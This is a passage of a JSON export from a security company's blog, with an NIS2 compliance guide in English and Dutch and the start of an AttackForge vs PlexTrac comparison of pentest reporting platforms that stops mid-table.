0)\"\u003e\u003cstrong\u003eConduct Cybersecurity Training\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eIn its latest 2024 report, Verizon found that the human element was a component in \u003c/span\u003e\u003ca href=\"https://www.verizon.com/business/resources/reports/dbir/2024/summary-of-findings/\" rel=\"noopener noreferrer nofollow\"\u003e\u003cspan style=\"color: rgb(5, 99, 193)\"\u003e68%\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e of breaches. It’s simple; if you don’t train your workforce on cybersecurity best practices, they will be your undoing.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eSo, create a culture of cybersecurity awareness within your organization. You can do this by:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eConducting regular \u003c/span\u003e\u003ca href=\"https://websec.nl/en/services/security-awareness-training\" rel=\"noopener noreferrer nofollow\"\u003e\u003cspan style=\"color: rgb(5, 99, 193)\"\u003ecybersecurity training and awareness\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e programs.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eOutlining policies and procedures for all employees to follow.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eEnsuring that senior management is involved in cybersecurity governance.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003col start=\"7\"\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eComply with Reporting Requirements\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eReporting requirements are stricter and clearer in NIS2 than those of its predecessor. To comply, ensure you do the following:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eTimely reporting by notifying relevant authorities within the timeframe.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eThorough documentation with detailed records of all incidents and remediation efforts.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eCollaboration with authorities during and after incidents.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003col start=\"8\"\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eCertify ISMS\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eBy certifying your ISMS against ISO 27001 and other relevant standards, you show that an independent auditor has verified your ISMS's compliance with industry best practices.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eThis provides concrete evidence of your organization’s strong security posture, which is not only useful for NIS2 supervision but also for broader business operations.\u003c/span\u003e\u003c/p\u003e\u003ch2\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eWhat Sectors are in the NIS2 Directive?\u003c/strong\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eAs we mentioned earlier, the industries required to comply with the EU's NIS2 directive are called Essential and Important entities.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eHere’s how they’re defined:\u003c/span\u003e\u003c/p\u003e\u003ch3\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eEssential Entities\u003c/strong\u003e\u003c/span\u003e\u003c/h3\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eThese are organizations that provide services that are considered crucial for society to run smoothly. This means any disruptions to their services could cause big problems and consequences. They are:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eEnergy\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eHealthcare\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eBanking\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eTransport\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eDrinking water\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eDigital infrastructure\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eDigital service providers\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eFinancial market infrastructure.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003ch3\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eImportant Entities\u003c/strong\u003e\u003c/span\u003e\u003c/h3\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eAlthough important entities are also crucial, their criticality isn’t quite as severe as essential entities. They are:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eFood\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eManufacturing\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003ePostal and courier services\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eWaste-water\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eWaste management\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003ePublic admin\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003ePublic electronic communications service providers\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eSpace\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eICE service management\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eChemicals\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli style=\"color: rgb(0, 0, 0)\"\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eResearch\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003ch2\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e\u003cstrong\u003eHow WebSec Can Help with NIS2 Compliance\u003c/strong\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eAs you prepare to comply with the EU's NIS2 directive, it's essential to maintain a thorough and proactive approach. WebSec can make compliance easier through specialized \u003c/span\u003e\u003ca href=\"https://websec.nl/en/services/nis2-pentest\" rel=\"noopener noreferrer nofollow\"\u003e\u003cspan style=\"color: rgb(5, 99, 193)\"\u003eNIS2 penetration testing\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e that is aligned with the requirements of the new directive. Our NIS2 pentest identifies and mitigates vulnerabilities for essential and important entities, helping you to strengthen your security posture and reduce legal and financial losses.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eIn the event of a breach, our \u003c/span\u003e\u003ca href=\"https://websec.nl/en/services/incident-response\" rel=\"noopener noreferrer nofollow\"\u003e\u003cspan style=\"color: rgb(5, 99, 193)\"\u003e24/7 incident response services\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e provide immediate support, ensuring timely and effective incident handling, regardless of the time of day. To help foster a culture of cybersecurity awareness in your organization, we provide comprehensive \u003c/span\u003e\u003ca href=\"https://websec.nl/en/services/security-awareness-training\" rel=\"noopener noreferrer nofollow\"\u003e\u003cspan style=\"color: rgb(5, 99, 193)\"\u003ecybersecurity training sessions\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e that equip your employees with the necessary skills and knowledge to detect, prevent, and respond to security threats without jeopardizing the organization's security.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003eBe proactive today! Want to learn more? \u003c/span\u003e\u003ca href=\"https://websec.nl/en/inquire\" rel=\"noopener noreferrer nofollow\"\u003e\u003cspan style=\"color: rgb(5, 99, 193)\"\u003eReach out now\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(0, 0, 0)\"\u003e, and one of our team members will be happy to help you.\u003c/span\u003e\u003c/p\u003e","summary":"As cyberattacks grow, the EU’s NIS2 directive builds on NIS1 to provide more rigorous cybersecurity measures. Learn how to ensure NIS2 compliance with WebSec.","image":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F605118a0c452ea0751962bdb%2F91276f2e-653f-475f-bd6b-2cbb0474a422%2Fnis2_thumbnail.png?alt=media\u0026token=4a7848b4-44b0-43cd-b677-b60a2660483e","format":"html","published":true,"tags":["nis2","compliance","nis2 directive","nis2 pentest"],"locale_code":"en","user_id":"61e2ba4446041c77accc8276","dutchArticleId":"66e7e1e736fedf63f949be33","priority":1726470951775,"User":{"name":"Gray Oshin","picture":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fusers%2F61e2ba4446041c77accc8276%2F90021e57215f4d94a8a76d9dcb50fac3%2FiY_JMCQtoFXfO-jtIWB2C?alt=media","desc":"A Team Member at Websec"},"DutchArticle":{"id":"66e7e1e736fedf63f949be33","updatedAt":"2024-09-16T07:45:51.476Z","createdAt":"2024-09-16T07:44:39.510Z","title":"Hoe Voorbereiden op de EU NIS2 Richtlijn","body":"![nis2_banner.png](https://websec.nl/storage/public%2Fblog%2F605118a0c452ea0751962bdb%2F7eb403cb-cdf7-4427-a51d-0efc2cbd3bb4%2Fnis2_banner.png)\n\n\nCyberaanvallen nemen in een alarmerend tempo toe. Bedrijven van alle groottes lijden hierdoor aanzienlijke reputatieschade en enorme financiële verliezen. De NIS2 (Netwerk- en Informatiesystemen Richtlijn 2) is het meest recente antwoord van de Europese Unie (EU) op deze verontrustende trend.\n\nWeet je niet zeker hoe je je moet voorbereiden op de NIS2-richtlijn? In dit artikel leggen we de specifieke stappen uit om te voldoen aan de richtlijn. We bespreken ook de betrokken sectoren en mogelijke sancties voor niet-naleving, zodat je met een gerust hart kunt zorgen dat je geen wetten overtreedt of wordt blootgesteld aan aanvallen.\n\n**Wat is de NIS2 Richtlijn?**\n\nDe NIS2 (Netwerk- en Informatiesystemen Richtlijn 2) is een wetgeving van de Europese Unie (EU) om de cyberbeveiliging van netwerken en informatiesystemen in de regio te verbeteren. De richtlijn is uitgevaardigd op 16 januari 2023, en EU-landen moeten deze tegen 17 oktober 2024 omzetten in nationale wetgeving.\n\n**Waarom is NIS2 Belangrijk?**\n\nVolgens het 2024 [Global Digital Trust Insights](https://www.pwc.com/dti) onderzoek van PwC is het percentage bedrijven dat te maken heeft gehad met datalekken die meer dan $1 miljoen hebben gekost, gestegen van 27% naar 36% ten opzichte van het voorgaande jaar. Dit wijst erop dat, ondanks bestaande maatregelen (zoals de NIS1), de vooruitgang in het verbeteren van de beveiliging niet bemoedigend is. Daarom zijn strengere richtlijnen nodig.\n\nHoewel NIS1, de eerste EU-wetgeving op het gebied van cyberbeveiliging, de lidstaten meer mogelijkheden gaf om cyberaanvallen te bestrijden, was de uitvoering ervan moeilijk. Er waren nogal wat tekortkomingen die het voor organisaties lastig en verwarrend maakten om te voldoen aan de eisen. Dit leidde tot fragmentatie op verschillende niveaus en maakte de invoering van NIS2 noodzakelijk.\n\nHet doel van de NIS2-richtlijn is daarom:\n\n- Versterken van bestaande beveiligingseisen.\n- Verbeteren van de beveiliging van de toeleveringsketen.\n- Vereenvoudigen van rapportageprocedures.\n- Introduceren van strengere toezichtsmaatregelen en sancties, inclusief gestandaardiseerde boetes binnen de EU.\n\nDeze uitbreiding van de NIS-richtlijn zorgt ervoor dat meer sectoren en entiteiten de juiste maatregelen nemen om de cyberbeveiliging in Europa op de lange termijn te verbeteren.\n\n**Verschillen Tussen NIS1 en NIS2**\n\nOp basis van de bovenstaande doelen zijn hier de belangrijkste veranderingen van NIS1 naar NIS2:\n\n- **Ruimere Reikwijdte**: NIS2 bestrijkt een breder scala aan sectoren en entiteiten dan NIS1. Dit omvat zowel essentiële als belangrijke entiteiten. Essentiële entiteiten leveren kritieke diensten aan het publiek, terwijl belangrijke entiteiten een belangrijke rol spelen in de economie of samenleving. In totaal wordt geschat dat deze uitgebreide reikwijdte meer dan 160.000 organisaties in de EU omvat.\n  \n- **Grondige Beveiligingsverplichtingen**: De verwarring bij NIS1 kwam vaak door vage eisen en inconsistenties. **NIS2 zal dat aanpakken met meer specifieke beveiligingsverplichtingen** die kritieke gebieden omvatten, zoals risicobeheer, incidentdetectie en -respons, en bewustwording en training op het gebied van cyberbeveiliging.\n\n- **Incidentrapportage**: NIS2 vereist dat organisaties **cybersecurity incidenten rapporteren** aan de autoriteiten, wat de verantwoordelijkheid vergroot. Deze verbeterde rapportage helpt autoriteiten cyberdreigingen beter te monitoren en coördineren in het geval van grote aanvallen. Onder de nieuwe richtlijnen moet een getroffen bedrijf een incident **binnen 24 uur na bewustwording** melden en een eindrapport indienen **niet meer dan een maand** later.\n\n- **Handhaving via Sancties**: De EU neemt strikte maatregelen om NIS2 af te dwingen, met zware boetes voor wie niet voldoet. **Essentiële entiteiten** kunnen maximaal **€10 miljoen** of **2%** van hun wereldwijde jaaromzet boete krijgen, afhankelijk van welke hoger is. Belangrijke entiteiten kunnen een boete krijgen tot **€7 miljoen** of **1,4%** van hun wereldwijde omzet.\n\n**Hoe Voor te Bereiden op NIS2 en Voldoen aan de Richtlijn**\n\nNu je begrijpt wat er op het spel staat en waarom deze nieuwe richtlijn belangrijk is, bespreken we hoe je je kunt voorbereiden op NIS2.\n\nHier zijn de belangrijkste maatregelen uit de [NIS2-richtlijn](https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CELEX:32022L2555\u0026qid=1706711760658#d1e3312-80-1):\n\n- **Veilig systeembeheer en -ontwikkeling**: De beveiliging van je systemen, applicaties en infrastructuur is essentieel gedurende hun levenscyclus. Zorg ervoor dat je strikte beveiligingsmaatregelen toepast van ontwikkeling tot inzet en buitengebruikstelling, zoals richtlijnen voor veilig coderen en beheer van wijzigingen.\n\n- **Risicomanagement en informatiebeveiliging**: Ontwikkel grondige risicobeheersingspraktijken en zorg dat je regelmatig je beleid bijwerkt om IT-kwetsbaarheden te identificeren en te beperken.\n\n- **Incidentbeheer en openbaarmakingsbeleid**: Zorg voor een solide [incidentresponsplan](https://websec.nl/diensten/incidentrespons) om schade door beveiligingsincidenten te minimaliseren en snel te herstellen.\n\n- **Beleid voor bedrijfscontinuïteit**: Zorg voor back-ups, rampenherstel en crisisbeheer, zodat de bedrijfsvoering ook bij verstoringen doorgaat.\n\n- **Beveiliging van de toeleveringsketen**: Werk samen met betrouwbare dienstverleners en auditeer hun beveiligingspraktijken regelmatig. Wist je dat bijna 30% van de datalekken [wordt veroorzaakt](https://www.securitymagazine.com/articles/100447-third-party-attack-vectors-are-responsible-for-29-of-breaches) door aanvallen op derden?\n\n- **Assetbeheer**: Houd een inventaris bij van alle belangrijke bedrijfsmiddelen en zorg voor hun beveiliging.\n\n- **Cyberhygiëne en training**: Regelmatige [trainingen](https://websec.nl/en/services/security-awareness-training) voor medewerkers zijn cruciaal, omdat zij de eerste verdedigingslinie vormen tegen cyberdreigingen.\n\n- **Encryptie en cryptografie**: Gebruik encryptie om gevoelige data te beschermen en definieer encryptiestandaarden en sleutels voor databeveiliging.\n\n- **Beveiliging van personeelszaken (HR)**: Stel toegangscontrolemaatregelen op, zodat alleen bevoegde personen toegang hebben tot cruciale systemen en informatie.\n\n- **Multi-factor authenticatie (MFA)**: Versterk de beveiliging door MFA in te zetten om ongeautoriseerde toegang te voorkomen.\n\n**Hoe WebSec kan Helpen met NIS2 Compliance**\n\nWebSec kan compliance vergemakkelijken door gespecialiseerde [NIS2-penetratietesten](https://websec.nl/diensten/nis2-pentest) die voldoen aan de vereisten van de nieuwe richtlijn. Onze NIS2 pentests identificeren en verhelpen kwetsbaarheden voor essentiële en belangrijke entiteiten, wat helpt om je beveiligingshouding te versterken en juridische of financiële verliezen te voorkomen.\n\nIn het geval van een inbreuk biedt WebSec 24/7 [incidentresponsdiensten](https://websec.nl/diensten/incidentrespons) die zorgen voor snelle en effectieve ondersteuning, ongeacht het tijdstip. Om een cultuur van cyberbewustzijn binnen je organisatie te bevorderen, bieden we uitgebreide [beveiligingstrainingen](https://websec.nl/diensten/beveiligingsbewustzijns-training) aan die je medewerkers de nodige vaardigheden en kennis bijbrengen om beveiligingsdreigingen te herkennen, te voorkomen en erop te reageren.\n\nWees vandaag nog proactief! [Neem contact op](https://websec.nl/aanvragen), en een van onze teamleden helpt je graag verder.","summary":"Met de toename van cyberaanvallen versterkt de EU’s NIS2-richtlijn de maatregelen op het gebied van cyberbeveiliging. Ontdek hoe je NIS2-compliance kunt waarborgen met WebSec.","image":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F605118a0c452ea0751962bdb%2Fc698888a-fee0-42df-8fa2-aab98ddafa29%2Fnis2_thumbnail.png?alt=media\u0026token=d9d24e9d-ffd1-4329-aad1-1fee6731ab3e","format":"md","published":true,"tags":["nis2","compliance","nis2 directive","nis2 pentest"],"locale_code":"nl","user_id":"605118a0c452ea0751962bdb","dutchArticleId":null,"priority":1726472679512,"User":{"name":"Joel Aviad Ossi","picture":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fusers%2F605118a0c452ea0751962bdb%2F8dcfdec2-f192-4322-8589-89d3b2969fc3%2F1660849684285.jpg?alt=media\u0026token=1a29fcec-1b74-4a92-828d-a71770a28755","desc":"Managing Director"}}},{"id":"66ad088bac92a30c342d414f","updatedAt":"2024-08-02T16:54:11.591Z","createdAt":"2024-08-02T16:25:47.238Z","title":"AttackForge vs PlexTrac Comparison: Differences, Similarities and Alternatives","body":"![bannerattackforgevsplextrac.png](https://websec.nl/storage/public%2Fblog%2F605118a0c452ea0751962bdb%2Fc787d6b7-6c1a-4d4a-abea-3647db18fd70%2Fbannerattackforgevsplextrac.png)\n\n\n# AttackForge vs PlexTrac Comparison: Differences, Similarities, and Alternatives\n\nAttackForge and PlexTrac are penetration testing management and reporting platforms. These pentest tools provide a centralized dashboard to facilitate security testing within small and large organizations. However, despite having the same purpose, AttackForge and PlexTrac still have differences that could make you choose one or the other. In this article, we’ll compare the differences, similarities, and features of AttackForge vs PlexTrac.\n\nBy the end, you’ll be able to make an informed decision on which platform offers the best value for your team’s needs. Let’s get right into it then.\n\n## **What is AttackForge?**\n\n[AttackForge](https://attackforge.com/) is a budget-friendly pentest management and reporting platform that allows you to manage pentesting workflows. It offers core services that promise to improve productivity, collaboration, and visibility without breaking the bank. This includes helping you manage different stages of your penetration test, such as:\n\n- Requesting, reviewing, and approving a pentest.\n- Gathering necessary entry criteria.\n- Registering security vulnerabilities and pentest findings.\n- Tracking testing against methodologies and test cases\n- Automated reporting for different stakeholders.\n- Generating automated reports through custom-built templates for reporting.\n- Integrating pentest findings into third-party systems.\n- Streamlined remediation and retesting workflows.\n\nAlthough some of the features from AttackForge are consistent with what other pentesting management platforms like PlexTrac offers, the former is still an industry standard for many reasons.\n\n### **AttackForge Strengths**\n\n- **Cost-Effective:** AttackForge’s Pro plan of $50/month is a good deal for an individual, while $150/month is also cost-effective for a startup or small team. Mid-sized consultancies and large MSSPs will need to spend $300 and $800 monthly, respectively, but this is still a relatively good price point. Enterprises can also purchase the Enterprise product which comes with custom pricing based on their needs.\n- **Consistency:** AttackForge’s pentesting processes and vulnerability language are consistent.\n- **Retesting Made Easy:** AttackForge simplifies the process of requesting and performing a retest, saving you valuable time.\n- **Great for Small to Large Companies:** AttackForge is built for companies running between 10 to 10,000 penetration tests yearly. \n- **Documentation:** AttackForge has extensive and comprehensive documentation with an active and open GitHub for contributors.\n- **Test Suites:** AttackForge comes preloaded with Test Suites from industry-standard methodologies like OWASP, MITRE, NIST, OSSTMM, etc.\n\n### **AttackForge Weaknesses**\n\n- **No AI Features:** AttackForge is yet to explore the use of AI, which would ideally have taken some manual work away from users.\n- **Limited Integration:** Imports from a handful of security tools are supported, but broader coverage will be beneficial.\n- **Multi-language Hurdle:** AttackForge doesn’t natively support multi-language reporting. \n\n## **What is PlexTrac?**\n\n[PlexTrac](https://plextrac.com/) is a penetration testing and vulnerability data management platform that helps with offensive security reporting, workflow automation, and remediation prioritization. \n\nMuch like other pentesting management platforms like AttackForge, PlexTrac also helps you manage different stages of your test.\n\nThe AI-powered platform provides a centralized hub that combines features like:\n\n- **Standardized Runbooks** that have preloaded curated content, test plan, and integrated procedures from MITRE and Atomic Red Team.\n- **Integrations** with apps like Jira to ensure your company’s existing project management processes continue.\n- **Analytics Module** that visualizes your security posture shows critical issues that need to be addressed and helps you communicate better with non-technical stakeholders.\n- **Bulk Actions** like pasting affected assets to quickly upload a list of assets directly into the finding, bulk edit status, delete, or assign asset findings.\n- **CSV Import** to import CSV findings into your PlexTrac report with a CSV parser \n- **Prioritization** to improve your resource allocation to the most critical areas.\n\nWhile you may find some of these features in other pentesting management platforms, PlexTrac has some strengths that make it a cut above most others.\n\n### **PlexTrac Strengths**\n\n- **Advanced Editor** that accurately parses values into the report easily and refines texts, making report creation more polished.\n- **Granular Reporting Control** provides custom templates to help you generate on-demand reports.\n- **Plex AI:** PlexTrac’s AI-powered assistant is great for content contextualization, generating executive summaries within the portal, remediation steps, analyzing large datasets, and generating vulnerability descriptions, which removes a lot of the manual work. This virtual report authoring reportedly slashes pentesting reporting time by 70%, resulting in huge time savings throughout the cycle.\n- **Project Management Powerhouse** helps you manage projects and resources with features like calendars, allocation tracking, and an assessments module to create questionnaires for pre-engagement scoping.\n- **Red Teaming vs Blue Teaming:** PlexTrac supports red teaming and blue teaming procedures.\n- **Broader coverage of imports** supports a wider variety of security tooling imports.\n- **Real-time collaboration** features make it an ideal tool for geographically dispersed teams.\n\n### **PlexTrac Weaknesses**\n\n- **Pricing Pinch:** PlexTrac’s Essential package starts at a hefty $8000/year, making it a tough sell for smaller teams.\n- **Multi-language Hurdle:** Currently, PlexTrac doesn’t natively support multi-language reporting. It requires separate templates for each language. Thankfully, AI-powered translation is on the horizon.\n- **No Direct Test Suites/Test Cases:** PlexTrac doesn’t have direct test suites/test cases, although test plans are available.\n\n# **What are the Core Functionalities for a Penetration Testing Platform?**\n\nThere are many penetesting platforms available to penetration testers today—AttackForge and PlexTrac are only two of them. Each platform offers distinctive features and functionalities. \n\nFor most pentesters, the preference comes down to the tool they find particularly effective or intuitive for their needs. Just as a well-fitting glove feels perfect, a pentesting tool that aligns with your workflow and style feels indispensable to you and your team.\n\nHowever, the penetration testing field is constantly evolving. New vulnerabilities are discovered regularly, meaning you need to be open to exploring new methodologies and tools. Moreover, the complexity of modern systems and applications requires having a feature-rich platform to manage all aspects of your pentests effectively.\n\nBelow, we’ll run through the key functionalities that a penetration testing management platform worth its salt should have.\n\n### **Reporting**\n\nIt’s one thing to find security loopholes, but it’s an entirely different thing to have an extensive and thorough report.\n\nAccording to [CoreSecurity’s Penetration Testing Report](https://www.coresecurity.com/resources/guides/2022-penetration-testing-report), reporting is the most sought-after feature in paid penetration testing software. This makes sense considering many pentesters and organizations use pen testing for compliance. Having consistent reports is not only useful internally but also meets the needs of regulatory auditors. \n\nTherefore, when choosing a penetration testing platform, look out for one that allows you to create professional reports with findings, recommendations, and remediation plans. \n\n### **Vulnerability Library/Management**\n\nA good number of organizations use pentesting management platforms to support their vulnerability management programs. If that sounds like you, then it goes without saying that this is also a core function to look out for. That is, the tool must simplify the discovery, prioritization, and remediation tracking of vulnerabilities discovered during pentest.\n\nAdditionally, having a vulnerability management functionality provides a single source of truth for all identified vulnerabilities and allows you to create an exhaustive risk assessment based on these vulnerabilities. \n\nBy offering this feature, a good pentesting management platform becomes the hub for identifying security issues and managing the process of fixing them throughout the pentesting lifecycle. \n\n### **Project Management**\n\nYou always want a pentesting platform with reliable project management functionality. This allows your team to organize and execute pentests in a controlled and efficient way. What project management entails here is a tool that can do the following:\n\n- **Scoping:** defining the pentest’s boundaries and scope, such as the testing intensity (black box, white box, grey box) and the systems, applications, or data to be tested.\n- **Scheduling:** planning and assigning deadlines for different stages of the pentest to meet established timelines.\n- **Resource allocation:** optimizing resource utilization by assigning pentesters to specific tasks based on their expertise and workload.\n- **Task tracking:** monitoring progress to identify potential delays and manage dependencies.\n\nUltimately, you need a tool that can provide extensive access to information about the entire pentesting process.\n\n### **Collaboration**\n\nIt’s also important to have a tool that provides secure communication channels between pentesters and stakeholders. This includes comment functionality, version control, task assignment and tracking, etc.\n\nBecause pentesting is often a collaborative effort, you need a tool that can facilitate that process and improve transparency.\n\n### **Third-party Integrations**\n\nAnother core functionality of a penetration testing platform is the ability to connect and interact with other security tools. This makes your workflow streamlined and automated. Integrations can happen between the pentesting platform and bug bounty platforms, SIEM systems, third-party vulnerability scanners, and development tools like code repositories.\n\nIn the end, having a tool that can do this will reduce manual workload, such as data entry, and provide better visibility.\n\n### **Compatibility**\n\nMost penetration testing software is compatible with Linux OS. Some of them come preinstalled on the OS. However, pentesting tools are also required to find vulnerabilities on other devices like those running on macOS, Windows OS, and Android smartphones. This makes it important to find multi-device-compatible pentesting software.\n\nOther features like fast response time and delivery speed, as well as compliance management features like multi-language reporting, can\n\n also be invaluable.\n\n## **AttackForge vs PlexTrac Comparison**\n\n# Comparison Table\n\n| Feature                           | AttackForge                                                                                                              | PlexTrac                                                                                                                                             |\n| :-------------------------------- | :----------------------------------------------------------------------------------------------------------------------- | :--------------------------------------------------------------------------------------------------------------------------------------------------- |\n| Reporting Customization           | AttackForge offers robust reporting engines (ReportGen) for creating highly customizable templates.                     | PlexTrac provides granular control with customizable templates for detailed reporting.                                                               |\n| Test Suites/Test Cases            | Preloaded with Test Suites from OWASP, MITRE, OSSTMM, and NIST, AttackForge ensures comprehensive test coverage.        | PlexTrac does not offer direct Test Suites or Test Cases, but includes detailed Test Plans for structured assessments.                               |\n| User Experience                   | AttackForge features a professional and detail-oriented user interface (UI) for an enhanced user experience.            | PlexTrac’s minimalistic theme may not appear professional to some users, impacting user experience.                                                  |\n| AI                                | AI support is unavailable in AttackForge.                                                                               | PlexTrac includes AI support with PlexAI, available at no additional cost for Premium users. Essential and Core users can add this feature or get a free trial. |\n| Secure Code Training Integration  | AttackForge integrates Secure Code Training with SecDim, promoting secure coding practices.                            | Secure Code Training integration is unavailable in 